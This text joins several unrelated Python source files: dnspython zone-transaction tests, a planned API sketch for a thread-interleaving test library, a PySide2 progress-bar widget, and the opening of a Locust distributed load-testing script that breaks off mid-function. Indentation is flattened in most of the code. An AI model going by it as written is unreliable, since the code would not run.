ns1 a 10.0.0.1
ns2 a 10.0.0.2
$TTL 300
$ORIGIN foo.example.
bar mx 0 blaz
"""
example_text_output = """@ 3600 IN SOA foo bar 1 2 3 4 5
@ 3600 IN NS ns1
@ 3600 IN NS ns2
@ 3600 IN NS ns3
ns1 3600 IN A 10.0.0.1
ns2 3600 IN A 10.0.0.2
ns3 3600 IN A 10.0.0.3
"""
@pytest.fixture(params=[dns.zone.Zone, dns.versioned.Zone])
def zone(request):
return dns.zone.from_text(example_text, zone_factory=request.param)
def test_zone_basic(zone):
with zone.writer() as txn:
txn.delete(dns.name.from_text('bar.foo', None))
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
rd = dns.rdata.from_text('in', 'a', '10.0.0.3')
txn.add(dns.name.from_text('ns3', None), 3600, rd)
output = zone.to_text()
assert output == example_text_output
def test_explicit_rollback_and_commit(zone):
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.rollback()
assert zone.get_node('bar.foo') is not None
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
txn.commit()
assert zone.get_node('bar.foo') is None
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete(dns.name.from_text('bar.foo', None))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.replace('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.reader() as txn:
txn.rollback()
txn.get('bar.foo', 'in', 'mx')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.delete_exact('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.name_exists('bar.foo')
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.update_serial()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.changed()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.rollback()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
txn.commit()
with pytest.raises(dns.transaction.AlreadyEnded):
with zone.writer() as txn:
txn.rollback()
for rdataset in txn:
pass
def test_zone_changed(zone):
# Read-only is not changed!
with zone.reader() as txn:
assert not txn.changed()
# delete an existing name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None))
assert txn.changed()
# delete a nonexistent name
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('unknown.bar.foo', None))
assert not txn.changed()
# delete a nonexistent rdataset from an extant node
with zone.writer() as txn:
assert not txn.changed()
txn.delete(dns.name.from_text('bar.foo', None), 'txt')
assert not txn.changed()
# add an rdataset to an extant Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('bar.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
# add an rdataset to a nonexistent Node
with zone.writer() as txn:
assert not txn.changed()
txn.add('foo.foo', 300, dns.rdata.from_text('in', 'txt', 'hi'))
assert txn.changed()
def test_zone_base_layer(zone):
with zone.writer() as txn:
# Get a set from the zone layer
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
def test_zone_transaction_layer(zone):
with zone.writer() as txn:
# Make a change
rd = dns.rdata.from_text('in', 'ns', 'ns3')
txn.add(dns.name.empty, 3600, rd)
# Get a set from the transaction layer
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2', 'ns3')
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
assert rdataset == expected
assert txn.name_exists(dns.name.empty)
ns1 = dns.name.from_text('ns1', None)
assert txn.name_exists(ns1)
ns99 = dns.name.from_text('ns99', None)
assert not txn.name_exists(ns99)
def test_zone_add_and_delete(zone):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
a100 = dns.name.from_text('a100', None)
a101 = dns.name.from_text('a101', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
txn.delete(a99, dns.rdatatype.A)
txn.delete(a100, dns.rdatatype.A)
txn.delete(a101)
assert not txn.name_exists(a99)
assert not txn.name_exists(a100)
assert not txn.name_exists(a101)
ns1 = dns.name.from_text('ns1', None)
txn.delete(ns1, dns.rdatatype.A)
assert not txn.name_exists(ns1)
with zone.writer() as txn:
txn.add(a99, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
with zone.writer() as txn:
txn.add(a100, rds)
txn.delete(a99)
assert not txn.name_exists(a99)
assert txn.name_exists(a100)
def test_write_after_rollback(zone):
with pytest.raises(ExpectedException):
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
raise ExpectedException
with zone.writer() as txn:
a99 = dns.name.from_text('a99', None)
rds = dns.rdataset.from_text('in', 'a', 300, '10.99.99.99')
txn.add(a99, rds)
assert zone.get_rdataset('a99', 'a') == rds
def test_zone_get_deleted(zone):
with zone.writer() as txn:
ns1 = dns.name.from_text('ns1', None)
assert txn.get(ns1, dns.rdatatype.A) is not None
txn.delete(ns1)
assert txn.get(ns1, dns.rdatatype.A) is None
ns2 = dns.name.from_text('ns2', None)
txn.delete(ns2, dns.rdatatype.A)
assert txn.get(ns2, dns.rdatatype.A) is None
def test_zone_bad_class(zone):
with zone.writer() as txn:
rds = dns.rdataset.from_text('ch', 'ns', 300, 'ns1', 'ns2')
with pytest.raises(ValueError):
txn.add(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.replace(dns.name.empty, rds)
with pytest.raises(ValueError):
txn.delete(dns.name.empty, rds)
def test_update_serial(zone):
# basic
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 2
# max
with zone.writer() as txn:
txn.update_serial(0xffffffff, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 0xffffffff
# wraparound to 1
with zone.writer() as txn:
txn.update_serial()
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
# trying to set to zero sets to 1
with zone.writer() as txn:
txn.update_serial(0, False)
rdataset = zone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1
with pytest.raises(KeyError):
with zone.writer() as txn:
txn.update_serial(name=dns.name.from_text('unknown', None))
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(-1)
with pytest.raises(ValueError):
with zone.writer() as txn:
txn.update_serial(2**31)
class ExpectedException(Exception):
pass
def test_zone_rollback(zone):
a99 = dns.name.from_text('a99.example.')
try:
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add(a99, rds)
assert txn.name_exists(a99)
raise ExpectedException
except ExpectedException:
pass
assert not zone.get_node(a99)
def test_zone_ooz_name(zone):
with zone.writer() as txn:
with pytest.raises(KeyError):
a99 = dns.name.from_text('a99.not-example.')
assert txn.name_exists(a99)
def test_zone_iteration(zone):
expected = {}
for (name, rdataset) in zone.iterate_rdatasets():
expected[(name, rdataset.rdtype, rdataset.covers)] = rdataset
with zone.writer() as txn:
actual = {}
for (name, rdataset) in txn:
actual[(name, rdataset.rdtype, rdataset.covers)] = rdataset
assert actual == expected
@pytest.fixture
def vzone():
return dns.zone.from_text(example_text, zone_factory=dns.versioned.Zone)
def test_vzone_read_only(vzone):
with vzone.reader() as txn:
rdataset = txn.get(dns.name.empty, dns.rdatatype.NS, dns.rdatatype.NONE)
expected = dns.rdataset.from_text('in', 'ns', 300, 'ns1', 'ns2')
assert rdataset == expected
with pytest.raises(dns.transaction.ReadOnly):
txn.replace(dns.name.empty, expected)
def test_vzone_multiple_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial(1000, False)
rdataset = vzone.find_rdataset('@', 'soa')
assert rdataset[0].serial == 1000
assert len(vzone._versions) == 4
with vzone.reader(id=5) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
with vzone.reader(serial=1000) as txn:
assert txn.version.id == 5
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 1000
vzone.set_max_versions(2)
assert len(vzone._versions) == 2
# The ones that survived should be 3 and 1000
rdataset = vzone._versions[0].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 3
rdataset = vzone._versions[1].get_rdataset(dns.name.empty,
dns.rdatatype.SOA,
dns.rdatatype.NONE)
assert rdataset[0].serial == 1000
with pytest.raises(ValueError):
vzone.set_max_versions(0)
# for debugging if needed
def _dump(zone):
for v in zone._versions:
print('VERSION', v.id)
for (name, n) in v.nodes.items():
for rdataset in n:
print(rdataset.to_text(name))
def test_vzone_open_txn_pins_versions(vzone):
assert len(vzone._versions) == 1
vzone.set_max_versions(None) # unlimited!
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.writer() as txn:
txn.update_serial()
with vzone.reader(id=2) as txn:
vzone.set_max_versions(1)
with vzone.reader(id=3) as txn:
rdataset = txn.get('@', 'soa')
assert rdataset[0].serial == 2
assert len(vzone._versions) == 4
assert len(vzone._versions) == 1
rdataset = vzone.find_rdataset('@', 'soa')
assert vzone._versions[0].id == 5
assert rdataset[0].serial == 4
try:
import threading
one_got_lock = threading.Event()
def run_one(zone):
with zone.writer() as txn:
one_got_lock.set()
# wait until two blocks
while len(zone._write_waiters) == 0:
time.sleep(0.01)
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.98')
txn.add('a98', rds)
def run_two(zone):
# wait until one has the lock so we know we will block if we
# get the call done before the sleep in one completes
one_got_lock.wait()
with zone.writer() as txn:
rds = dns.rdataset.from_text('in', 'a', 300, '10.0.0.99')
txn.add('a99', rds)
def test_vzone_concurrency(vzone):
t1 = threading.Thread(target=run_one, args=(vzone,))
t1.start()
t2 = threading.Thread(target=run_two, args=(vzone,))
t2.start()
t1.join()
t2.join()
with vzone.reader() as txn:
assert txn.name_exists('a98')
assert txn.name_exists('a99')
except ImportError: # pragma: no cover
pass
|
planned_api.py
|
import unittest
import threading
import threadmock
from threadmock import Breakpoint, backtrack_test, whitebox_test, random_test
@threadmock.defaults(max_depth=10, runs=1000)
class PlannedAPIExamples__General(unittest.TestCase):
@random_test(runs=5000)
    def test_random(self, s):
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
@random_test # default value of 'runs' argument is used
    def test_random_with_defaults(self, s):
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
    # to consider: also have a possibility of switch_when for random tests
@backtrack_test(max_depth=8)
def test_backtrack_catch_all(self, s):
s.switch_when(...)
s.switch_when(...)
s.switch_when(...)
s.switch_when(...)
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
SUT.wait()
self.assertSomething(SUT)
@backtrack_test # default value of 'max_depth' argument is used
def test_backtrack_capture(self, s):
        # the Breakpoint constructor takes a predicate as arguments
b1 = Breakpoint(...)
b2 = Breakpoint(...)
SUT = SystemUnderTest()
s.add_invariant(lambda: SUT.check_invariant())
SUT.start_bunch_of_threads()
# t1, t2 are instances of threading.Thread
        # Breakpoint.capture_thread() is a context manager equivalent to
        # calling Breakpoint.acquire() on entry and Breakpoint.release() on exit
with b1.capture_thread() as t1:
t1.switch_when(...)
            # Thread.switch_when(...) takes a predicate as arguments. When the
            # thread on which switch_when() was called holds the processor and the
            # given predicate is true, a context switch away from this thread is
            # allowed to occur.
            # The @backtrack_test decorator checks all possible thread interleavings,
            # given that context switches are only allowed at the points specified
            # by previous switch_when calls.
t1.switch_when(...)
t2 = b2.acquire()
t2.switch_when(...)
t2.switch_when(...)
t2.switch_when(...)
        # Breakpoint.acquire() waits until any of the running threads matches the
        # breakpoint predicate/specification and pauses that thread.
        # For the thread to continue execution,
        # Breakpoint.release() has to be called.
        # NOTE: if any of the running threads matches the breakpoint condition
        # _before_ Breakpoint.acquire() (or Breakpoint.capture_thread()) is called,
        # the thread is paused anyway.
b2.release()
        # s is an instance of threadmock.State.
        # s.switch_when(...) is equivalent to calling this method on every
        # thread (including threads that will be created in the future; this of
        # course applies only until the end of the function currently decorated
        # with @backtrack_test).
s.switch_when(...)
SUT.wait()
self.assertSomething(SUT)
@backtrack_test
def test_backtrack_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
        # NOTE: the switch_when calls have to be made before the threads
        # are started; calling switch_when on a running thread will raise an exception.
        # This applies to the [switch_when, run_until, run_while, throw] methods:
        # they can only be called on a thread that is not yet started or
        # on a thread that is blocked on some breakpoint.
        # Calling switch_when on a non-started thread does not change the thread's
        # status; calling run_until, run_while or throw on a non-started thread
        # changes its status to waiting-on-breakpoint.
t1.switch_when(...)
t1.switch_when(...)
t2.switch_when(...)
t2.switch_when(...)
t1.start()
t2.start()
t1.join()
t2.join()
self.assertSomething(SUT)
@whitebox_test
def test_whitebox_capture(self, s):
b1 = Breakpoint(...)
b2 = Breakpoint(...)
SUT = SystemUnderTest()
SUT.start_bunch_of_threads()
t1 = b1.acquire()
t2 = b2.acquire()
t1.run_until(...)
self.assertSomething(SUT)
t2.run_until(...)
        # s.locals, s.func, s.cls and s.line are available here and store the
        # state of the last non-main thread that held the processor;
        # here that would be t2.
self.assertSomething(s.locals.some_variable)
self.assertSomething(s.func)
self.assertSomething(s.line)
t1.run_while(...)
self.assertSomething(SUT)
t2.run_until(...)
b1.release()
b2.release()
t1.join()
t2.join()
self.assertSomething(SUT)
@whitebox_test
def test_whitebox_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
        # NOTE: do not invoke Thread.start() here! If you did, control would
        # reach these run_until() calls only after the (already started) threads
        # had been running for a while, probably having already passed the points
        # that the conditions given to run_until(...) were supposed to catch.
        # This is why any invocation of run_until or run_while on a running
        # thread raises an exception; they can only be invoked on
        # non-started or waiting-on-breakpoint threads.
        # IMPLEMENTATION NOTE: calling run_until() on a non-started thread
        # places an implicit helper breakpoint on that thread and then starts it,
        # so that the threading.Thread.start() code is allowed to execute
        # (threading.Thread.start() waits on a threading.Event that is
        # signalled when the new thread has finished its initialization).
        # Thus run_until, run_while or throw on a non-started thread changes
        # its status to waiting-on-breakpoint, where the breakpoint is not exposed
        # to the user, who is left with the run_until family of calls.
# TO CONSIDER: some way for the user to access this internal breakpoint
t1.run_until(...)
self.assertSomething(SUT)
t2.run_until(...)
t1.run_until(...)
self.assertSomething(SUT)
t1.run_until(...)
t2.run_while(...)
# instead of .join() - these threads not running, so cannot join()
# join on such threads will raise an exception explaining these concepts
# and suggesting using run_until(is_alive=False) or calling .release()
# on a corresponding breakpoint before
t1.run_until(is_alive=False)
t2.run_until(is_alive=False)
self.assertSomething(SUT)
@threadmock.defaults(max_depth=10, runs=1000)
class PlannedAPIExamples__Predicates(unittest.TestCase):
# predicates here are illustrated using Thread.run_until
# they work the same way when used as arguments to:
# Breakpoint.__init__, Thread.run_while, Thread.switch_when,
# threadmock.State.switch_when, threadmock.State.add_invariant
@whitebox_test
def test_whitebox_create(self, s):
SUT = SystemUnderTest()
t1 = threading.Thread(target=SUT.do_work)
t2 = threading.Thread(target=SUT.do_work)
# s is an instance of threadmock.State
# add an invariant to be checked before each executed line
# of code (implemented as a sys.settrace hack). This is most useful in
# random_test and backtrack_test though
s.add_invariant(lambda: SUT.check_invariant())
        # the most basic form of a predicate is a lambda without arguments;
        # if the lambda raises a LocalVariableAttributeError, it is treated as
        # if the predicate returned false. The example below matches any
        # function that has a local variable named 'a' with the value 5
t1.run_until(lambda: s.locals.a == 5)
        # the following 2 lines are equivalent and run the t1 thread until
        # it blocks on any synchronization primitive (all of them are
# implemented using a thread.allocate_lock() anyway)
t1.run_until(is_blocked=True)
t1.run_until(lambda: t1 in s.blocked_threads)
# assert that t1 waits on some particular resource
# SUT.some_resource can be any of the synchronization primitives found
# in stdlib's threading module
self.assertTrue(t1 in s.waiting_for[SUT.some_resource])
# run thread t2 until it releases the resource that t1 waits for.
        # the run_until method will raise an exception if the thread
        # finishes before the specified condition is met
t2.run_until(lambda: t1 not in s.blocked_threads)
# runs until t1 enters a function named 'somefunction'
# a function object cannot be used here because of implementation issues
# TO CONSIDER: allow using a function object here and check equivalence
# of underlying code objects...
t1.run_until(func='somefunction')
t1.run_until(lambda: s.func == 'somefunction')
        # the following 2 are equivalent and run until the next assignment
# instruction; s.line is a line of code stripped of leading and
# trailing whitespace
t2.run_until(lambda: ' = ' in s.line, func='otherfunction')
t2.run_until(lambda: ' = ' in s.line and s.func == 'otherfunction')
t1.run_until(line='some_object.some_method()')
t1.run_until(lambda: s.line == 'some_object.some_method()')
# runs until the thread finishes execution
t1.run_until(is_alive=False)
t1.run_until(lambda: t1 not in s.alive_threads)
### PROBLEMS:
## How to break in the middle of instructions of the form: a += b ?
# one solution from the internet:
# http://nedbatchelder.com/blog/200804/wicked_hack_python_bytecode_tracing.html
# a patch decorator can be made that replaces the requested function's code
# (f.__code__) with fake line numbers (pretending that each bytecode
# instruction is on a separate line) in the lnotab attribute, so that the
# sys.settrace trace function is invoked before each bytecode instruction
# instead of before each line
# (a minimal settrace baseline sketch appears at the end of this file)
## Check whether threading.Thread swallows exceptions raised in the thread
# and how exception handling in greenlets works
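# As a rough baseline sketch (stdlib only, not part of the planned threadmock API):
# plain sys.settrace line tracing fires one event per source line, which is exactly
# what the lnotab hack mentioned above would refine into one event per bytecode
# instruction.
import sys
def _trace_lines(frame, event, arg):
    # 'line' events arrive just before each traced source line executes
    if event == 'line':
        print('about to run', frame.f_code.co_name, 'line', frame.f_lineno)
    return _trace_lines
def _traced_demo():
    a = 1
    a += 2  # with plain line tracing this whole statement is a single event
    return a
if __name__ == '__main__':
    sys.settrace(_trace_lines)
    try:
        _traced_demo()
    finally:
        sys.settrace(None)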
|
ProgressBar.py
|
# -*- coding: utf-8 -*-
# @Time : 2020/8/2 18:03
from __init__ import *
import sys, time
from PySide2.QtCore import Signal, QObject, Slot
from ui2py.Progress import *
class Bar(QObject):
progress_update = Signal(int)
def __init__(self,q):
super().__init__()
# print("process1.kill()2\n")
        # Use a Signal so the worker thread can update main-thread widgets
self.progress_update.connect(self.setProgress)
        # Used for the subsequent login step
self.flag_login = 0
        # Put the login-success flag into the queue for later use
self.q = q
self.ui = QUiLoader().load('../UI/Progress.ui')
        self.ui.setWindowTitle('Logging in')
self.ui.show()
self.AnimalBar()
# self.ui = Ui_ProgressBar()
# self.ui.setupUi(self)
# self.show()
# self.ChangeValue()
def ChangeValue(self):
# self.bankLock.acquire()
for i in range(0, 101, 10):
            # Emit the signal here; the slot takes time to finish, so wait between emissions to see the updated progress value
self.progress_update.emit(i)
time.sleep(0.5)
# self.bankLock.release()
def AnimalBar(self):
thread1 = Thread(target=self.ChangeValue)
thread1.start()
    # Slot that handles progress updates
@Slot(int)
def setProgress(self,value):
self.ui.LoginProgress.setValue(value)
if self.ui.LoginProgress.value() == 100:
self.flag_login = 1
self.q.put(self.flag_login)
# print("Login Successful")
            # QMessageBox.information(self.ui, 'Login successful', "Preparing the interface, please wait...")
# self.deleteLater()
self.ui.close()
def BarInstance(q):
# print("{0}BarInstance Creat ok()\n".format(q))
app = QApplication(sys.argv)
app.setWindowIcon(QIcon('../UI/Bank.ico'))
bar = Bar(q)
bar.AnimalBar()
sys.exit(app.exec_())
if __name__ == '__main__':
q1 = mp.Queue(10)
app = QApplication(sys.argv)
app.setWindowIcon(QIcon('../UI/Bank.ico'))
bar = Bar(q1)
sys.exit(app.exec_())
    # Restart in a separate process to run the progress-bar UI
# process1 = mp.Process(target=BarInstance, args=(q1,))
# process1.start()
# process1.join()
# print(q1.get())
|
runDistributedLoadtest.py
|
#!/usr/bin/env python3
"""
does distributed load testing using Locust on NCS instances
"""
# standard library modules
import argparse
import contextlib
import getpass
import json
import logging
import os
import socket
import signal
import subprocess
import sys
import threading
import time
import uuid
# third-party module(s)
import requests
# neocortix modules
import analyzeLtStats
import extractAnsibleRecap
import ncscli.ncs as ncs
# try:
# import ncs
# except ImportError:
# # set system and python paths for default places, since path seems to be not set properly
# ncscliPath = os.path.expanduser('~/ncscli/ncscli')
# sys.path.append( ncscliPath )
# os.environ["PATH"] += os.pathsep + ncscliPath
# import ncs
logger = logging.getLogger(__name__)
# possible place for globals is this class's attributes
class g_:
signaled = False
class SigTerm(BaseException):
#logger.warning( 'unsupported SigTerm exception created')
pass
def sigtermHandler( sig, frame ):
g_.signaled = True
logger.warning( 'SIGTERM received; will try to shut down gracefully' )
#raise SigTerm()
def sigtermSignaled():
return g_.signaled
def boolArg( v ):
'''use with ArgumentParser add_argument for (case-insensitive) boolean arg'''
if v.lower() == 'true':
return True
elif v.lower() == 'false':
return False
else:
raise argparse.ArgumentTypeError('Boolean value expected.')
def scriptDirPath():
'''returns the absolute path to the directory containing this script'''
return os.path.dirname(os.path.realpath(__file__))
def loadSshPubKey():
pubKeyFilePath = os.path.expanduser( '~/.ssh/id_rsa.pub' )
with open( pubKeyFilePath ) as inFile:
contents = inFile.read()
return contents
# some port-reservation code adapted from https://github.com/Yelp/ephemeral-port-reserve
def preopen(ip, port):
''' open socket with SO_REUSEADDR and listen on it'''
port = int(port)
s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
#logger.info( 'binding ip %s port %d', ip, port )
s.bind((ip, port))
# the connect below deadlocks on kernel >= 4.4.0 unless this arg is greater than zero
s.listen(1)
return s
def preclose(s):
sockname = s.getsockname()
# get the port into a TIME_WAIT state
with contextlib.closing(socket.socket()) as s2:
s2.connect(sockname)
s.accept()
s.close()
# return sockname[1]
def preopenPorts( startPort, maxPort, nPorts ):
sockets = []
gotPorts = False
while not gotPorts:
try:
for port in range( startPort, startPort+nPorts ):
logger.info( 'preopening port %d', port )
sock = preopen( '127.0.0.1', port )
sockets.append( sock )
gotPorts = True
except OSError as exc:
logger.warning( 'got exception (%s) %s', type(exc), exc, exc_info=False )
startPort += nPorts
sockets = []
if startPort >= maxPort:
break
results = {}
if not gotPorts:
logger.error( 'search for available ports exceeded maxPort (%d)', maxPort )
return results
results['ports'] = list( range( startPort, startPort+nPorts ) )
results['sockets'] = sockets
return results
def launchInstances_old( authToken, nInstances, sshClientKeyName, filtersJson=None ):
results = {}
# call ncs launch via command-line
filtersArg = "--filter '" + filtersJson + "'" if filtersJson else " "
cmd = 'ncs.py sc --authToken %s launch --count %d %s --sshClientKeyName %s --json > launched.json' % \
(authToken, nInstances, filtersArg, sshClientKeyName )
try:
subprocess.check_call( cmd, shell=True, stdout=sys.stderr )
except subprocess.CalledProcessError as exc:
logger.error( 'CalledProcessError %s', exc.output )
#raise # TODO raise a more helpful specific type of error
results['cloudServerErrorCode'] = exc.returncode
results['instancesAllocated'] = []
return results
def launchInstances( authToken, nInstances, sshClientKeyName,
filtersJson=None, encryptFiles=True ):
returnCode = 13
# call ncs launch via command-line
#filtersArg = "--filter '" + filtersJson + "'" if filtersJson else " "
#cmd = 'ncs.py sc --authToken %s launch --count %d %s --sshClientKeyName %s --json > launched.json' % \
# (authToken, nInstances, filtersArg, sshClientKeyName )
cmd = [
'ncs.py', 'sc', '--authToken', authToken, 'launch',
'--encryptFiles', str(encryptFiles),
'--count', str(nInstances), # filtersArg,
'--sshClientKeyName', sshClientKeyName, '--json'
]
if filtersJson:
cmd.extend( ['--filter', filtersJson] )
#logger.debug( 'cmd: %s', cmd )
try:
outFile = open('launched.json','w' )
#proc = subprocess.Popen( cmd, shell=True )
proc = subprocess.Popen( cmd, stdout=outFile )
while True:
#logger.debug( 'polling ncs')
proc.poll() # sets proc.returncode
if proc.returncode != None:
break
if sigtermSignaled():
logger.info( 'signaling ncs')
proc.send_signal( signal.SIGTERM )
try:
logger.info( 'waiting ncs')
proc.wait(timeout=60)
if proc.returncode:
logger.warning( 'ncs return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'ncs launch did not terminate in time' )
time.sleep( 1 )
returnCode = proc.returncode
if outFile:
outFile.close()
except Exception as exc:
logger.error( 'exception while launching instances (%s) %s', type(exc), exc, exc_info=True )
returnCode = 99
return returnCode
def terminateThese( authToken, inRecs ):
logger.info( 'to terminate %d instances', len(inRecs) )
iids = [inRec['instanceId'] for inRec in inRecs]
ncs.terminateInstances( authToken, iids )
def jsonToInv():
cmd = 'cat launched.json | jsonToInv.py > launched.inv'
try:
subprocess.check_call( cmd, shell=True, stdout=sys.stderr )
except subprocess.CalledProcessError as exc:
logger.error( '%s', exc.output )
raise # TODO raise a more helpful specific type of error
def installPrereqs():
invFilePath = 'launched.inv'
tempFilePath = 'data/installPrereqsDeb.temp'
scriptDirPath = os.path.dirname(os.path.realpath(__file__))
jsonToInv()
logger.info( 'calling installPrereqsQuicker.yml' )
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ANSIBLE_DISPLAY_FAILED_STDERR=yes ansible-playbook %s/installPrereqsQuicker.yml -i %s | tee data/installPrereqsDeb.temp; wc installed.inv' \
% (scriptDirPath, invFilePath)
try:
exitCode = subprocess.call( cmd, shell=True, stdout=subprocess.DEVNULL )
if exitCode:
logger.warning( 'ansible-playbook installPrereqs returned exit code %d', exitCode )
except subprocess.CalledProcessError as exc:
logger.error( '%s', exc.output )
raise # TODO raise a more helpful specific type of error
installerRecap = extractAnsibleRecap.extractRecap( tempFilePath )
wellInstalled = extractAnsibleRecap.getGoodInstances( installerRecap )
sys.stderr.flush()
return wellInstalled
def startWorkers( victimUrl, masterHost, dataPorts ):
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook %s/startWorkers.yml -e "victimUrl=%s masterHost=%s masterPort=%s" -i installed.inv |tee data/startWorkers.out' \
% (scriptDirPath(), victimUrl, masterHost, dataPorts[0])
try:
subprocess.check_call( cmd, shell=True, stdout=subprocess.DEVNULL )
except subprocess.CalledProcessError as exc:
logger.warning( 'startWorkers returnCode %d (%s)', exc.returncode, exc.output )
def killWorkerProcs():
logger.info( 'calling killWorkerProcs.yml' )
cmd = 'ANSIBLE_HOST_KEY_CHECKING=False ansible-playbook %s/killWorkerProcs.yml -i installed.inv' \
% (scriptDirPath())
try:
subprocess.check_call( cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL )
except subprocess.CalledProcessError as exc:
logger.info( 'exception from killWorkerProcs (return code %d)', exc.returncode )
def output_reader(proc):
for line in iter(proc.stdout.readline, b''):
print('Locust: {0}'.format(line.decode('utf-8')), end='', file=sys.stderr)
def startMaster( victimHostUrl, dataPorts, webPort ):
logger.info( 'calling runLocust.py' )
result = {}
cmd = [
'python3', '-u', scriptDirPath()+'/runLocust.py', '--host='+victimHostUrl,
'--heartbeat-liveness=30',
'--master-bind-port', str(dataPorts[0]), '--web-port', str(webPort),
'--master', '--loglevel', 'INFO', '-f', scriptDirPath()+'/master_locust.py'
]
try:
proc = subprocess.Popen( cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT )
result['proc'] = proc
t = threading.Thread(target=output_reader, args=(proc,))
result['thread'] = t
t.start()
except subprocess.CalledProcessError as exc:
# this section never runs because Popen does not raise this exception
logger.error( 'return code: %d %s', exc.returncode, exc.output )
raise # TODO raise a more helpful specific type of error
finally:
return result
def stopMaster( specs ):
logger.info( 'specs %s', specs )
proc = specs.get('proc')
if proc:
proc.terminate()
try:
proc.wait(timeout=5)
if proc.returncode:
logger.warning( 'runLocust return code %d', proc.returncode )
except subprocess.TimeoutExpired:
logger.warning( 'runLocust did not terminate in time' )
thread = specs.get('thread')
if thread:
thread.join()
def genXmlReport( wasGood ):
'''preliminary version generates "fake" junit-style xml'''
templateProlog = '''<?xml version="1.0" ?>
<testsuites>
<testsuite tests="1" errors="0" failures="%d" name="loadtests" >
<testcase classname="com.neocortix.loadtest" name="loadtest" time="1.0">
'''
templateFail = '''
<failure message="response time too high">Assertion failed</failure>
'''
templateEpilog = '''
</testcase>
</testsuite>
</testsuites>
'''
if wasGood:
return (templateProlog % 0) + templateEpilog
else:
return (templateProlog % 1) + templateFail + templateEpilog
def testsPass( args, loadTestStats ):
if loadTestStats.get('nReqsSatisfied', 0) <= 0:
return False
return loadTestStats.get('meanResponseTimeMs30', 99999) <= args.reqMsprMean
def conductLoadtest( masterUrl, nWorkersWanted, usersPerWorker,
startTimeLimit, susTime, stopWanted, nReqInstances, rampUpRate
):
logger.info( 'locals %s', locals() )
hatch_rate = rampUpRate if rampUpRate else nWorkersWanted # force it non-zero
if not masterUrl.endswith( '/' ):
masterUrl = masterUrl + '/'
if stopWanted:
logger.info( 'requesting stop via %s', masterUrl+'stop' )
resp = requests.get( masterUrl+'stop' )
logger.info( '%s', resp.json() )
startTime = time.time()
deadline = startTime + startTimeLimit
workersFound = False
while True:
if g_.signaled:
break
try:
